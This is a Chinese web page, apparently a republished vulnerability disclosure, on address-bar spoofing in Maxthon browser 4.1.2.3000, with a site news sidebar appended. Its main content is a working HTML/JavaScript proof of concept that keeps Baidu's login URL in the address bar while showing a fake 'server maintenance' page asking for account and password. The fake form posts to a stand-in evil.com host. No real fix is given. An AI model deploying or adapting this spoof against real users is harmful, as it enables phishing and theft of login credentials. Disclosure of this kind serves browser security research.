傲游浏览器4.1.2.3000 伪造任意网站内容
俺也是遨游的老用户了其实 - - 你故意五天忽略 漏洞还是在那儿 你偷偷修复了……结果还是没照顾到这个问题……Base+A跟直接地址栏打开网址逻辑不一样是为甚……和以前spoof只能spoof不存在的网站不同 这个spoof只能spoof已经存在的网站 没细看 新遨游貌似是修复了不存在的网站耗时过多的问题 存在的还是有逻辑问题
<html><base href="https://passport.baidu.com/aclogin.php?queryWord="><div style="display:none"><a href="#" id="ak">asd</a></div><script>document.writeln("<title>Hello World</title>");document.writeln("<h1>伪造网页</h1>");document.writeln("百度服务器维护,在此输入您的帐号密码。 这样写是不是显得危害大一点? 帐号<form method=post action=http://evil.com/aaa><input type=text/></form> ");var s="W";var i=0;var dd=0;for(i=0;i<30000;i++)s+=('A'+Math.random()*10);document.getElementById("ak").href=s;function x(){if(dd==0){dd=1;document.getElementById("ak").click();}else{document.write("<scr"+"ipt>function e(){window.stop();document.stop();document.writeln('<title>Hello World</title>');document.writeln('<h1>伪造网页</h1>');document.writeln('这个部分是伪造的。你懂得2。');}</scr"+"ipt>");}document.stop();window.stop();window.stop();window.stop();window.stop();document.stop();}setInterval("x();",2130);</script></html>
如果偶尔出411了 刷新几次 随机数据嘛~
不像以前点击关闭之后地址栏会变回本地路径 这儿点击关闭之后地址栏路径就变成 A HREF里面的地址了 所以可以SPOOF
当然 不点效果也是一样 只不过多个圈看起来挺烦人的
修复方案:
大牛们 你们都懂的
>更多相关文章
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 11-28Bossjob宣布上线AI翻译功能
- 11-28腾讯应用宝电脑版推小宝AI助手 部分功能已
- 11-28周鸿祎亲自上阵演短剧,将于发布会上播出
- 11-28机构:2024第三季度全球NAND闪存产业营收增
- 11-18LG新能源宣布与Bear Robotics达成合作,成为
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御